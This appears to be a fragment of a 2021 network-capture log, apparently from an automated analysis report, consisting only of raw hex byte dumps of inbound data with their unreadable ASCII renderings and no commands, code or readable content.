                                                                                                                                                                                2021-11-11 11:26:10 UTC3181INData Raw: 5b bc 89 a7 79 d4 fd 72 6e 37 8a 48 55 6c 3c 28 21 f0 93 e9 03 cd 87 0b 7e c2 c8 90 ad e6 1d cb 2a 9a 53 c5 25 6b ed 4b 2c ff 26 6a 38 97 d9 5c c9 58 6f 9d 6c 61 b5 01 09 c1 ee 0b 3e e2 f5 89 e5 b9 2c 3f 17 e1 c1 ed 07 d0 39 f5 ca 9e 4b 82 c5 88 f8 00 e4 12 b5 ff dc 2f f7 bd 51 a0 48 c0 27 c5 fb a3 ab 25 6c 9a 21 e7 04 09 35 78 1a d6 7c 2d 09 e1 88 7c c6 5a 5d e6 d0 86 24 ef a0 8e d6 40 7f bf d6 40 ee ca 68 43 a8 45 de 19 c2 14 ae 75 a7 52 e5 f9 97 c5 25 20 db b3 68 28 be 79 55 63 83 93 aa e5 ec 39 a6 4e ea cb 7a 50 d0 d9 bf 51 33 44 e1 9b 88 12 f7 10 ac 8e a4 98 39 c9 bd 5c 59 5a de ef 25 f6 6c 2c 58 7b 4e 9d b2 f3 d3 a1 63 02 c8 b8 04 91 99 98 2b e3 31 42 c0 d5 74 47 c3 42 a5 84 84 49 32 e1 5f d1 3c c8 a9 25 c6 85 4b 4c f0 45 31 4f cf ca 32 14 c9 f0 a4
                                                                                                                                                                                Data Ascii: [yrn7HUl<(!~*S%kK,&j8\Xola>,?9K/QH'%l!5x|-|Z]$@@hCEuR% h(yUc9NzPQ3D9\YZ%l,X{Nc+1BtGBI2_<%KLE1O2
                                                                                                                                                                                2021-11-11 11:26:10 UTC3197INData Raw: 47 f2 4b d1 df c7 8b 0b e5 51 10 cb 96 af cd dc 04 93 af a3 34 2d 10 fc 34 51 e2 27 9b 44 ef f0 91 83 ca 00 02 d0 41 03 16 a8 8d 73 44 c3 9d 75 59 bd 6c 66 3e d5 fd 5e cd af 2d bb 7a 65 83 fd 4b 5b af 54 78 fa e7 7b 77 ba f8 8b 51 d2 59 b1 8a eb 90 21 09 10 b7 c5 08 b1 ac cb 48 3d da c9 ea d7 4e 69 ee 01 97 c5 b8 a7 5d 4e 78 eb 01 f8 27 3a a1 9c 72 2b d0 f8 05 cc a7 2a 52 b8 17 a1 c5 08 3a 72 fd c2 55 d6 98 5a f5 45 c2 13 c4 ba b3 09 4f ef 12 59 ea c4 23 a9 28 82 41 8b 0f 78 3e 9f 45 11 a7 71 63 2f 75 97 d1 02 4b a6 06 31 5f fe 79 52 5d 5e 1d 49 53 89 9b 33 18 ca cb 55 74 0b 72 70 be 9f f3 7a a5 47 fb 29 20 27 57 94 0e 5f e7 34 d3 bb c4 90 af b7 5a 51 7b 2b 73 f4 c1 d4 b8 ea b4 c2 0b 4d 55 c5 48 25 66 f5 ef 3f 8a 44 5f b2 2c 12 c5 ca a8 7f b5 bb cb e6 5a
                                                                                                                                                                                Data Ascii: GKQ4-4Q'DAsDuYlf>^-zeK[Tx{wQY!H=Ni]Nx':r+*R:rUZEOY#(Ax>Eqc/uK1_yR]^IS3UtrpzG) 'W_4ZQ{+sMUH%f?D_,Z
                                                                                                                                                                                2021-11-11 11:26:10 UTC3213INData Raw: 02 41 04 0c 01 ec eb 52 31 c0 79 6d 7e a0 ce 18 b9 c0 a4 96 90 e3 47 5f 16 d1 e3 fa ff 30 de 8a a3 be d5 fd dc 18 a6 2f 0c 11 3a 70 16 00 b0 a5 ad 4a a7 04 91 72 01 1f 3b 65 58 3d 37 86 30 81 6f 38 a1 3a 00 ac 51 4e 02 9b ba 6b 3d fe ff b1 6a 1a 48 5f 00 69 a3 a5 f6 7f 4e d1 ee 00 69 64 dc 2e 05 a4 08 32 83 48 28 80 f5 23 2f f3 0f 69 5e bf fc ad 4b cd ae 6e c4 d4 ab a4 eb f1 95 14 33 24 f6 80 03 cb bb af d2 ca f7 ee 73 95 ce 5a b5 a9 ba 55 16 69 9d 42 92 79 05 e9 55 3a d4 f5 19 55 4d 32 18 25 f8 f4 98 49 5f 5b e9 a9 63 42 31 c3 ff 94 39 95 c2 3e 7f 9c 18 5e ce e6 4f 4e cc 30 0f 12 4c 89 c3 a9 3d 96 ad 98 8b 48 e7 66 08 c3 ca 4b d1 7e 48 3a 42 e9 f0 ba c3 6a d5 09 8f f5 e5 4f b2 22 c8 5f ec e3 9d d0 c8 9d de 2a 69 c8 ea 21 d8 9f b2 91 f7 fb 3e af ec 55 4a
                                                                                                                                                                                Data Ascii: AR1ym~G_0/:pJr;eX=70o8:QNk=jH_iNid.2H(#/i^Kn3$sZUiByU:UM2%I_[cB19>^ON0L=HfK~H:BjO"_*i!>UJ
                                                                                                                                                                                2021-11-11 11:26:10 UTC3229INData Raw: d3 e9 c2 d9 b9 58 bb 00 98 34 36 93 68 01 1b 54 55 32 4e 40 6d 31 c2 e9 0e da a7 fc ff ee ca e3 b6 30 2c 81 a1 25 48 8c 82 10 ba 6a 48 12 12 4f 03 3f 06 bd f6 e7 ac 55 11 12 8a d4 58 ba 98 43 f6 22 f1 20 08 d0 d1 9b 7c 04 d4 8c 05 46 c6 d3 90 09 34 c3 f5 4a 02 c9 94 10 44 1c 80 88 f1 a9 b0 15 0f 05 d4 88 de 94 dc d3 06 97 e8 e1 8c fe 84 c1 80 48 23 47 df 89 14 54 2b 54 2a 69 51 0b 6b f1 e6 64 49 bb ad e5 cb 0a 79 40 12 c3 ab cc 10 13 95 6e b1 ea ea 3f 44 2b cf ff 49 c5 d0 d0 03 80 be 43 24 4a 66 ab ce 04 ce 13 1c 25 55 c5 d6 26 25 a5 7f c5 c2 ad fe 62 44 e9 ab e8 75 b5 8c 10 f6 58 80 2c f2 09 e4 09 97 94 11 f0 11 96 61 65 88 22 54 07 55 ba 7d 58 10 b4 97 5a f3 3e 12 4c f1 df 2f 45 5a c1 12 cf 7a 5f ab 64 85 c1 bc 29 d7 2b b7 b1 6f 4e 37 63 0e c9 e5 ff 98
                                                                                                                                                                                Data Ascii: X46hTU2N@m10,%HjHO?UXC" |F4JDH#GT+T*iQkdIy@n?D+IC$Jf%U&%bDuX,ae"TU}XZ>L/EZz_d)+oN7c
                                                                                                                                                                                2021-11-11 11:26:10 UTC3245INData Raw: d1 39 44 c0 ea d9 1b 3f 12 54 fb 65 32 82 08 29 f3 09 bc a9 c8 a1 af 55 90 a4 05 90 b7 1c b3 b5 6c e3 bd c2 fe f1 cb 41 45 01 28 a5 a5 f8 e2 d7 0c fe 52 a3 ca 0d 53 ac 5a a5 3e 6a e8 b9 82 48 01 ca 9a 6f 5f d9 37 84 45 8b 09 cd c0 2a fa 62 e3 1b d3 0e 20 b4 03 e9 31 85 f0 38 66 13 82 af 84 ab d9 b3 f1 cd 7b f8 90 e7 c5 eb ff dd 72 21 00 2a c4 78 ee 9c 20 89 7d d8 25 29 c7 51 1f 49 77 e4 10 27 89 c9 b2 71 55 f1 c9 6d ea 22 96 d5 6c cb e5 e6 96 82 82 f7 ee 67 4b e8 a3 c3 33 f3 53 03 84 45 01 df ee 74 67 b3 98 49 57 4e ad b0 6b 9c 02 07 09 c8 7f 60 1c ff 37 fc 21 17 fe 9d d3 e8 d8 e7 60 0f 72 59 19 4f 0a f8 15 e0 31 5b 4e 04 7f 1f 41 b3 cf fa 99 d7 1d 97 3a b3 cd 9d 03 d8 45 08 5d 5b 0e ed 6a 27 e3 4d 46 12 f7 8c dd e1 b7 5b 43 a0 8a 9f de 4f 73 13 c5 01 fe
                                                                                                                                                                                Data Ascii: 9D?Te2)UlAE(RSZ>jHo_7E*b 18f{r!*x }%)QIw'qUm"lgK3SEtgIWNk`7!`rYO1[NA:E][j'MF[COs
                                                                                                                                                                                2021-11-11 11:26:10 UTC3261INData Raw: 58 7c 73 26 ea 4e 73 eb 8f 0c 2d e4 fb bd a7 7d 66 26 5a 21 c2 70 e0 12 57 3a 94 6e d4 5b 29 fb 12 25 bf 39 81 72 b5 d3 f6 f7 5f e9 af 93 ae d9 dc 3c e7 4e e2 90 df a5 ab 66 4c 5c 77 89 97 53 2f a6 04 2d ce fb 55 35 06 3c d8 09 29 f0 9c 90 69 0d 80 e1 5d 7a 3a a6 45 54 b0 87 13 66 5d 11 bb 64 a8 fc 0a 4a ef c2 b7 c6 d7 f1 89 c9 7f d3 44 16 90 8e 5e 48 04 9e af d5 16 13 ee 0d 52 88 5a 27 12 46 b7 5f 33 e7 fa 24 25 97 69 8b e1 f7 ee dc bf 6c 6b 27 c2 14 12 e2 09 0d 75 8b 3c ee 9d 8a a3 f4 7b 7a 32 b0 55 4c f3 d3 ad e0 e7 f3 95 4e fd b0 c5 97 7e af 69 fd e2 05 62 da 6d 32 10 cb c9 03 c1 80 e9 2e ba 72 cc ec 6c cc 97 ff 90 be 03 31 cb 92 c7 76 4d 25 dc 56 53 16 ee 25 f0 65 a0 ba 84 6a ea cb 08 4f 32 49 78 21 45 29 33 2a e2 a5 89 f0 99 f5 35 3e a7 2f 51 39 72
                                                                                                                                                                                Data Ascii: X|s&Ns-}f&Z!pW:n[)%9r_<NfL\wS/-U5<)i]z:ETf]dJD^HRZ'F_3$%ilk'u<{z2ULN~ibm2.rl1vM%VS%ejO2Ix!E)3*5>/Q9r
                                                                                                                                                                                2021-11-11 11:26:10 UTC3277INData Raw: d7 fa ff 57 e0 68 93 18 e0 3a f0 13 c3 27 9e fa dd 07 14 11 33 d6 28 05 18 e2 c8 04 7d 0c eb 09 00 f4 23 fb ff 01 18 0f c0 f3 14 2d 82 7a fe 70 38 03 96 bf 2f 88 4f d8 18 44 25 8f da fb 14 31 b4 55 14 bb df 8b 8a 9e c2 5a 20 bc 72 67 3e c6 1d 39 7c cd 3e 68 01 60 1d 6d 62 c1 47 95 6e 92 11 bb 6e 28 7f 10 25 99 69 08 5b 09 27 88 19 ab 30 68 2a ea c7 00 6b 3a 01 cc 15 14 44 95 38 32 79 0c cd 6c 2a 4d 70 6c 8d 24 84 17 14 db ed 5f a5 01 0f d6 66 7b b0 37 40 b7 25 eb 1e c3 35 db 8b 48 82 a4 78 42 30 26 0d 18 52 b8 3f bd d1 a5 03 28 b6 e9 7f 8b 25 87 51 32 92 22 c0 58 01 0c 27 fd 7d 43 ac 62 07 4f ca 0c f2 37 89 5f 7b 56 b6 b4 d8 07 f6 8f c3 55 a3 00 4e 31 a2 1a 30 8b 78 10 a8 9c 27 ab 50 40 c4 ea e0 6a d5 20 87 40 e5 13 f4 83 c0 f0 9b f5 25 79 1d e0 40 c0 3d
                                                                                                                                                                                Data Ascii: Wh:'3(}#-zp8/OD%1UZ rg>9|>h`mbGnn(%i['0h*k:D82yl*Mpl$_f{7@%5HxB0&R?(%Q2"X'}CbO7_{VUN10x'P@j @%y@=
                                                                                                                                                                                2021-11-11 11:26:10 UTC3293INData Raw: a0 cf b9 80 69 ab 07 dd 65 9e 12 c5 f3 b0 25 12 db 71 2f ff 24 13 e8 dc 41 0a 96 9b 65 12 57 8f ff d9 aa 2f db aa 4a bf 2c 9e c4 54 08 48 1b 99 25 a7 7f 4c 3d 97 59 9f 20 ca 64 23 ac f8 bf cb 18 5a b9 1a f4 24 24 ea 8e 0f 7d 29 33 19 2e 42 8b 02 d5 12 82 7f 71 3f e8 1c ce c0 0a 61 58 bc 30 95 5b bb 82 09 f1 b0 fe d4 33 52 d5 65 01 2d 6c 44 ea f1 bf 4c b5 70 41 4f 03 b6 ec 5b 85 9a bf 74 b3 ba 32 d6 04 77 9c c5 9d 98 4e 29 c0 9f c5 82 13 ed 09 3c f3 fd ba 05 75 b0 b2 8b 6d cb 45 d0 7c 81 c9 d8 6d b3 9a 0a 80 4c e0 49 7f 6a 04 7f 31 c4 4c 6a 0b f3 2d d5 b1 ca 36 6a b2 b7 96 ec d8 a5 e8 fb 51 1f 2f 28 c3 c8 95 98 b5 f6 26 f0 72 4a 7e a8 ad a2 e8 57 fe a5 5a fd 9e 37 9f 66 56 2f 31 c7 ff 0f cb a9 f2 75 e5 e7 ad de 72 a7 5c 23 25 2f cd 4e c0 65 2d 90 48 1a f2
                                                                                                                                                                                Data Ascii: ie%q/$AeW/J,TH%L=Y d#Z$$})3.Bq?aX0[3Re-lDLpAO[t2wN)<umE|mLIj1Lj-6jQ/(&rJ~WZ7fV/1ur\#%/Ne-H
                                                                                                                                                                                2021-11-11 11:26:10 UTC3309INData Raw: ed fe b7 b6 4e b8 fd c4 31 d7 ac 36 a5 67 2d 5e 56 dd 16 2a ed 72 d2 bb 12 25 8a cc 59 a9 4a ba 8b d0 4a bc 4a d6 fd f6 f5 bb 12 9b ba f7 57 49 b5 96 92 cf c9 77 08 4c 29 c9 77 38 aa f3 40 b4 a1 64 4c bf 91 52 d6 49 7b 74 03 9c fb ed 93 65 ad 6a cb 55 96 56 9f ec d4 fd 7a 71 04 c5 50 2e cb 62 4f f6 0c 4d 9d 93 ba a3 87 96 ed 37 89 4c fd 02 f3 63 55 6d 83 25 f2 a9 04 e0 16 8d ba 33 a2 1e 0a 34 31 4f 08 1c 30 04 f0 fd 9a aa ad 41 dd 88 bb 20 82 53 58 29 64 01 e9 d8 2f 10 bd 47 38 c0 44 d1 e5 3b 6a 9c 03 92 b0 e9 71 c6 46 19 2e 4a 76 30 28 c0 5e 66 31 a9 48 0c 3a 8c c0 56 aa 4b 37 ea ca 04 38 79 58 c0 38 f5 14 c9 1b ec 01 6f ab c8 0e 32 a8 86 9c 74 9f 2f 35 1c db 8b a3 30 a4 26 59 9d 0e ec ac 93 2d 07 68 01 f6 ca 78 0a 39 99 bf 95 94 07 24 ed 2e 00 0f f9 21
                                                                                                                                                                                Data Ascii: N16g-^V*r%YJJJWIwL)w8@dLRI{tejUVzqP.bOM7LcUm%341O0A SX)d/G8D;jqF.Jv0(^f1H:VK78yX8o2t/50&Y-hx9$.!
                                                                                                                                                                                2021-11-11 11:26:10 UTC3325INData Raw: c9 f5 c2 4c d5 f1 ff 49 56 41 62 09 c9 7d 78 4c 9d f0 46 91 23 68 36 bf 59 31 5f e9 3f 2c cc 7c e9 29 13 5c 01 72 6c 8a 4f 05 f3 e6 4f c7 9c 61 63 3e 49 2f fb 34 0e e3 90 6b 2e df 84 bf e9 fd 72 97 c4 20 ea f7 19 2d 39 f5 b9 b4 48 3b ca e2 4a fa dd b3 0c 6a ea bd 7b 15 96 02 71 f4 cd 80 7c fb b4 cb 24 2e f2 34 69 04 07 3e af 28 e3 f3 a4 7a 4a fc ac 7a f2 f0 f5 67 2e 2d 7e 9d c1 44 2b 3a 7a d4 de ae ec 25 2f cb 5e f7 e2 05 ca fc 25 49 5f 0f a6 96 39 4c 5d 83 6b c5 1a 82 63 3e 5f ce 3d 2e 31 f3 0e 69 de a5 2f e7 c6 3f 5a ac 36 b7 c0 20 41 19 66 5e 17 29 26 6b d5 94 fa e2 ea d7 af 13 5d fe 09 06 f3 dd c5 bb aa 27 b7 b9 2f 31 e2 df 6e ef b7 c5 e6 93 f7 98 c1 01 97 96 63 b6 d5 13 11 0b 38 db 62 6d 56 3f cb f7 ba 35 dc a1 6b d5 16 32 bb 8f 20 f0 4b 11 bd 97 c4
                                                                                                                                                                                Data Ascii: LIVAb}xLF#h6Y1_?,|)\rlOOac>I/4k.r -9H;Jj{q|$.4i>(zJzg.-~D+:z%/^%I_9L]kc>_=.1i/?Z6 Af^)&k]'/1nc8bmV?5k2 K
                                                                                                                                                                                2021-11-11 11:26:10 UTC3341INData Raw: 63 fb 44 e2 c7 78 a3 4b 97 bc ce 42 33 96 ff c5 72 83 9e d7 9f 34 c7 a6 a9 49 17 4a ea 62 3f 05 5d f4 b8 5a f7 53 33 bb cf f9 94 9a 16 7b ea 88 e2 3f 65 f2 bb a7 f1 5e fe 32 77 ca d7 46 51 95 e1 ac d2 6a d9 17 2b ac 9a 17 e9 8a b1 75 32 3b c9 cc 31 97 ef ea ff 73 56 27 e2 f0 77 94 cf bc 01 4f 52 64 17 cd 01 47 06 e9 7e d5 50 c7 42 ef 3e 8b c8 25 2d 1a f8 de 1b 13 e0 64 3a 17 bc b2 70 d7 be 64 18 94 3b eb dc b1 0d aa 2f 09 c4 fe 57 0c d0 49 0e 1e 9d 7d 16 96 d2 6f af b3 cc d5 2b 9d d7 78 e3 6a 40 92 dc a8 c4 f7 62 5b d3 ad ea d6 e9 3d df ab b0 2f 5e 1e 41 39 38 9c 30 b9 da c9 de d7 fc bc c1 4d 09 e1 3b 29 98 11 4f 01 f9 2e 74 14 84 41 be b7 c5 2f c2 f5 96 15 b7 4e c0 d7 52 b3 b8 40 d7 e7 95 df 16 49 27 8a 39 7c 9b 65 57 13 38 e8 bf 41 d5 2a ac 16 a4 65 f0
                                                                                                                                                                                Data Ascii: cDxKB3r4IJb?]ZS3{?e^2wFQj+u2;1sV'wORdG~PB>%-d:pd;/WI}o+xj@b[=/^A980M;)O.tA/NR@I'9|eW8A*e
                                                                                                                                                                                2021-11-11 11:26:10 UTC3357INData Raw: f4 3d de 12 86 4c 4e ea e2 45 96 bb d9 76 3f a9 a1 88 c3 6b 57 9a 95 56 da 8e 86 0f 52 f6 3b 2e 88 78 64 db c0 56 59 e0 0d 5f 05 e8 c3 a1 c6 3f 2e 69 e7 3b 29 9c 3f 85 1c bb 1b ee 5e 4f 36 31 4e ce 40 6e 2c 61 4d b0 b6 9d ec 1c 13 4c 01 db fe 73 1e 89 d4 fe 74 03 ab e2 65 4a a8 33 e2 66 40 48 67 bf 98 08 4a ff b2 03 14 ef 78 88 df 6e b4 e5 4d 12 2e e0 c0 c7 e3 29 d6 87 ea 09 fb 75 14 56 5c d0 a2 84 01 d7 a9 ba 3e 29 6f 82 f7 9d 8d 2f ef 04 6c c8 04 be 3d ac 7d 92 cb 4c 7a a4 4f f2 f6 89 89 05 d9 f1 95 90 5f 19 8b 1a 44 c6 6e e7 82 28 01 82 1a 33 9d d3 10 54 49 25 f7 04 b9 ca af ec c5 f2 c0 f9 50 92 03 bd 65 81 5b 94 62 08 25 27 3b b3 d2 c9 32 5b 67 4b d7 46 d1 5c 38 f5 e1 33 3b 7f 2d 69 02 bd f2 79 61 63 2b 3b e1 39 3a 2f b6 00 48 ed 2f db 30 a0 b3 55 96
                                                                                                                                                                                Data Ascii: =LNEv?kWVR;.xdVY_?.i;)?^O61N@n,aMLsteJ3f@HgJxnM.)uV\>)o/l=}LzO_Dn(3TI%Pe[b%';2[gKF\83;-iyac+;9:/H/0U
                                                                                                                                                                                2021-11-11 11:26:10 UTC3373INData Raw: c9 d7 79 ee ad b1 39 29 2a b3 67 16 c0 88 f6 45 27 35 5f e5 e3 b3 e8 c7 5b f5 b6 1d 92 56 35 fb 73 0f 09 5e 74 94 9f c5 30 ed 0f 4f 72 7e f3 55 54 cf 59 41 6f 05 13 29 df 80 a4 11 cf 85 4e 78 5c 55 df c6 eb f7 2d 62 03 4e 81 13 41 09 31 99 3c 2b e1 fb 3e f9 ac d3 e1 99 3a 8a 06 5b 88 0d 09 64 dc 3e f2 ee ad fa c9 3a 94 44 bf d9 67 c9 50 5b 97 c5 69 b5 b8 ae f3 8c 92 bf e2 d6 8e 63 d3 ad 9d da 74 fc 80 50 cb 20 95 65 2f b2 cc 11 55 5e 14 52 55 f3 9c ad 55 ba 2f dc 19 ec 22 ea 4e 20 a3 9c 9f 89 e2 3f 31 7b 39 7a e7 ca 4f 84 9b af f0 ad c1 95 f1 a0 e2 09 de 57 ca 8e 55 d4 47 28 66 93 73 af 74 9c 52 5f 5c 33 44 21 ba 82 47 3e f5 f8 84 5a 31 f8 c9 27 cf 5f 1c 4a 82 83 f3 2c a7 a9 0a 7f 94 c0 95 d0 97 95 c4 e6 5e 49 29 39 6a 8c 5f ce fd 3b 32 84 3a 55 73 42 2d
                                                                                                                                                                                Data Ascii: y9)*gE'5_[V5s^t0Or~UTYAo)Nx\U-bNA1<+>:[d>:DgP[ictP e/U^RUU/"N ?1{9zOWUG(fstR_\3D!G>Z1'_J,^I)9j_;2:UsB-
                                                                                                                                                                                2021-11-11 11:26:10 UTC3389INData Raw: 72 5b 3d 29 da 14 39 38 9b 00 45 fb 78 58 41 30 33 ff e8 f1 40 be 80 5b f4 ef b6 2a 24 e2 94 63 31 e7 9f 35 cf ba cb dc 25 04 59 c7 c2 21 d2 d5 cc e4 95 d9 c2 4b de 2e c4 ec e8 00 ca e8 f0 17 f6 86 43 80 4f e6 e1 18 39 4b c9 05 56 dc e2 31 f6 75 3a 42 d5 e4 89 76 4d 4a db af 71 4e e2 08 2a 29 b8 3f d4 c7 ab ed 53 cb e3 ff 16 bb 4b f3 a6 3b 5b e8 63 a2 c2 74 bd 68 93 89 ea 90 74 49 79 ee 08 33 5b 0b 74 c8 fb 16 e9 b3 8b 96 fb 64 87 ff 04 61 01 f6 ec 97 b3 4c ea fa 51 5e 47 f2 04 04 56 be d9 92 6f 21 96 31 0b 7a 13 7d af dd 3a 3b ba 64 a1 ab fc 2b b2 49 42 31 f7 4e 80 25 89 c5 5d 44 be 9b 69 25 77 ec a2 8b 3b 2d e6 c8 89 05 7f 4c 03 b5 40 13 09 d7 9c 80 c9 dd 09 01 42 36 d5 f1 a6 48 14 a5 d2 cb 4b ef b8 26 e5 0b 56 f1 57 ee 6c 5a c5 ab 72 bc f5 92 61 77 fe
                                                                                                                                                                                Data Ascii: r[=)98ExXA03@[*$c15%Y!K.CO9KV1u:BvMJqN*)?SK;[cthtIy3[tdaLQ^GVo!1z}:;d+IB1N%]Di%w;-L@B6HK&VWlZraw
                                                                                                                                                                                2021-11-11 11:26:10 UTC3405INData Raw: 5b d2 12 10 ea 1c 95 67 74 5f 72 2a d7 6d a5 f5 3a b1 89 74 5d d9 88 4d 6d 3a bc e2 e5 bd 51 c4 e1 04 8a 87 12 89 ca bf 8d 71 30 bd d1 9f a9 02 7f 1b bd 25 14 c0 62 bf 78 b4 b3 ec a5 73 07 89 f7 3f 79 76 6f c5 35 90 aa 6d 4c 04 a8 be e2 dd d3 1f 0d 4d 03 16 3b 3b 28 5f e9 97 74 85 59 2b 89 34 25 88 47 84 96 eb 75 43 88 42 21 4a f0 e2 dc 8a f2 76 05 41 21 13 bb 12 95 a8 1c a2 ce 6c 9b b8 da 97 65 2e 26 e5 af 7c 62 cf 53 fd 8e c5 c5 70 ab e2 7b 9d ef 6c 51 26 01 f6 4d 2f 70 1a 4a c2 e7 9b 4d 0c cb 25 71 8f 69 46 6b b7 cc 00 7a fa b5 f8 14 bd 76 14 c5 f2 05 25 45 8a b8 aa 7d 5a f8 e9 38 c0 ea f9 fe ca 5d ba 07 b7 56 b7 e3 c5 d1 87 08 9c f5 c9 29 d5 f5 3a 20 f3 c2 25 57 aa 06 4f 2f 57 9d c6 96 33 ab cb 18 13 03 75 89 ab 3c 78 a6 61 9e 7f db 3e 75 45 ad 1e f3
                                                                                                                                                                                Data Ascii: [gt_r*m:t]Mm:Qq0%bxs?yvo5mLM;;(_tY+4%GuCB!JvA!le.&|bSp{lQ&M/pJM%qiFkzv%E}Z8]V): %WO/W3u<xa>uE
                                                                                                                                                                                2021-11-11 11:26:10 UTC3421INData Raw: c3 9c ae 03 bf 6e 2e 98 28 b7 f9 7f 44 e3 b3 8f 29 c3 3e 13 cb ae 29 30 3c a0 8b 58 fe a3 52 ff b2 bc 8a e7 09 68 d3 44 c2 eb db ce 5a 39 cc 60 67 11 02 80 fa f7 0f 86 17 2a 48 02 29 16 41 30 54 8f eb 78 d5 d7 54 ce 4f 0b 4d 31 d9 f6 8a 44 c9 fa 74 5c e3 6c 7e 97 fc 42 c2 c1 d9 dc aa cb 5f 0e dc 7d af 32 7d f7 8b 12 df 14 fd 9c ec a7 d6 7f 79 35 49 17 f6 1a 5f 53 26 0b c9 90 ee 48 9c 57 4c ea e4 b7 ba b7 f5 f8 c4 9c 39 49 7c 8e a5 d1 29 c9 f7 b2 e2 7c ba 42 8b 37 4e 25 5a 49 ee 31 6a 0d 78 6b 39 8e 2e ab 2d 1c 7f 57 bc ea ca f7 77 93 51 13 ea af f3 eb c4 f4 08 8a e1 29 ec a2 89 29 d0 5c 8d e8 b9 a5 45 57 2b 1d 84 41 2b 33 ee ca 34 5b bd 39 5b a2 0a 92 ff f7 4d 4e b2 9e 92 ae 61 5a ca 78 3e cb 0a 47 97 4b f8 97 5a d9 2c a3 0f c6 14 e5 0e 16 01 37 be 2c 47
                                                                                                                                                                                Data Ascii: n.(D)>)0<XRhDZ9`g*H)A0TxTOM1Dt\l~B_}2}y5I_S&HWL9I|)|B7N%ZI1jxk9.-WwQ))\EW+A+34[9[MNaZx>GKZ,7,G
                                                                                                                                                                                2021-11-11 11:26:10 UTC3437INData Raw: 01 12 89 c6 f7 b4 77 25 c3 0d 31 c3 35 7f b8 5c b4 25 8c be 88 14 c6 b9 c8 c3 33 19 27 1e db ec 7b ec f3 3e f4 f9 ad 51 09 a3 7f 14 5d 42 c5 09 4c 29 ce 7f ce 3e 2e e5 04 7c 64 c3 ea c4 45 bf 8a 97 2f f6 6c 18 e0 08 84 95 b2 62 5c aa 27 59 d3 cb e2 f7 f6 52 52 d6 1d e9 7f 0b 9c 5d 94 73 9d 92 e5 05 f5 ce f7 53 4b a8 e6 16 8b 38 ab ca 29 4b b8 e8 4b f8 30 a2 dd 7f e5 9a be 93 63 02 a2 9e 93 a9 a7 d0 f1 56 fc 4e ed 54 5b f2 25 cf 06 c9 e7 7d 89 6b d5 e9 8a db 7a 8a a8 4a bc fc 5c 73 a4 ed d5 13 31 f0 e6 ac 58 9c 16 e8 4d ea 12 b3 e2 fb 8b e9 74 48 51 f6 2e 8f d5 10 c7 c3 d3 61 18 44 03 f6 8f b6 55 29 92 12 41 ea 65 1d 09 73 c2 51 dd 44 f1 34 aa b5 cb 6f 9a 2f 2f c5 d5 9c 3b 93 14 0e 45 29 53 b7 61 65 84 da fd ae d5 10 4b ab d8 2b c2 84 97 f5 12 57 42 88 d5
                                                                                                                                                                                Data Ascii: w%15\%3'{>Q]BL)>.|dE/lb\'YRR]sSK8)KK0cVNT[%}kzJ\s1XMtHQ.aDU)AesQD4o//;E)SaeK+WB
                                                                                                                                                                                2021-11-11 11:26:10 UTC3453INData Raw: 89 de fa f0 90 97 02 04 cc 08 67 51 a5 cc 89 9d ec a0 9d 70 94 9d 1c fa 82 e1 5f 1c bd 95 c9 47 29 2f dd 9e 3f b8 81 3d 01 5c 88 c9 ce 32 17 d5 ca 71 fd d3 9f a7 5e 43 09 8b 1f d6 5f 51 f6 2a e3 bd 27 f3 34 3d 9f 65 b5 14 c9 ae d3 a1 17 7a a6 d4 7a 65 c0 4b 0d 8c 92 f8 99 ef 41 21 c3 4d 2a e5 af 6f e0 a7 d8 9d d3 18 a7 c7 aa 05 3e ff e3 ef 8a 13 25 ee d4 35 c9 fa c5 4a 21 ff c5 3e ea e3 5b d7 0f bd f0 30 c9 e0 d5 1c f0 bd bb 19 f2 e9 7d 65 d0 ae e4 c2 c5 11 4c 92 70 88 95 65 e4 a8 bc 62 45 4a 01 d8 d0 af 5e 1e c4 d1 bb b6 2c 4b 81 9a 29 c1 2a b6 a9 41 ec 2a ab 17 6a e9 d6 c5 09 f6 ea f6 ac 12 8b 1b 4c b1 9c 56 fe bf d3 e5 1e 03 ad f9 51 40 eb 4a ab 68 7e 6e bf dc f3 d2 12 0e f1 b2 13 ea fb 39 a5 6b b7 89 4e e4 d5 eb b5 ee 00 9d 89 84 71 b5 69 7d 1c f3 b7
                                                                                                                                                                                Data Ascii: gQp_G)/?=\2q^C_Q*'4=ezzeKA!M*o>%5J!>[0}eLpebEJ^,K)*A*jLVQ@Jh~n9kNqi}
                                                                                                                                                                                2021-11-11 11:26:10 UTC3469INData Raw: ea 2b dc 72 89 6b d0 e1 d6 b7 c9 46 6c 4b d9 fb 9a c1 6b 9f c7 01 ad c0 e7 29 de 97 d9 29 eb c6 80 f2 f6 f5 6f fd 22 92 c5 67 bf 2d ae 2b cd cf 3b 08 19 19 10 eb 25 33 74 ab c9 f6 55 21 77 a7 76 d3 49 5f 53 aa ad 6c 05 27 ef 10 d9 3b c9 d9 97 4b 4c 55 95 ff 29 7b 7f 12 f5 5f 4e 79 25 ee 04 d1 7b 6f d6 fb 99 d3 2b a1 6c 68 38 a4 ee 24 b7 d3 1d 67 5b 24 e9 b0 da e7 f1 c3 cd cb 19 11 e9 de 3a 68 56 0e 96 92 5a 7e 96 aa 3a bd fb d3 3e 81 59 4c 89 0a e9 36 26 f7 9d d2 08 ac 27 e4 ab fd 24 90 96 da 5a d8 bc 95 c7 bf 2d 09 32 74 c5 52 fd 92 86 94 99 a2 18 d7 ee 81 82 92 fd fb ce 89 ce 40 5b 6a 09 21 f0 14 0b 98 59 cb 06 f1 55 49 c6 ce db 9a d1 5b e5 a5 57 66 cc d3 c8 aa e2 e7 d2 35 79 ec 2b c6 31 ca 6a 95 d8 b3 d2 1a a3 4a 92 52 3a fc a1 89 eb d7 4e 51 42 f1 4b
                                                                                                                                                                                Data Ascii: +rkFlKk))o"g-+;%3tU!wvI_Sl';KLU){_Ny%{o+lh8$g[$:hVZ~:>YL6&'$Z-2tR@[j!YUI[Wf5y+1jJR:NQBK
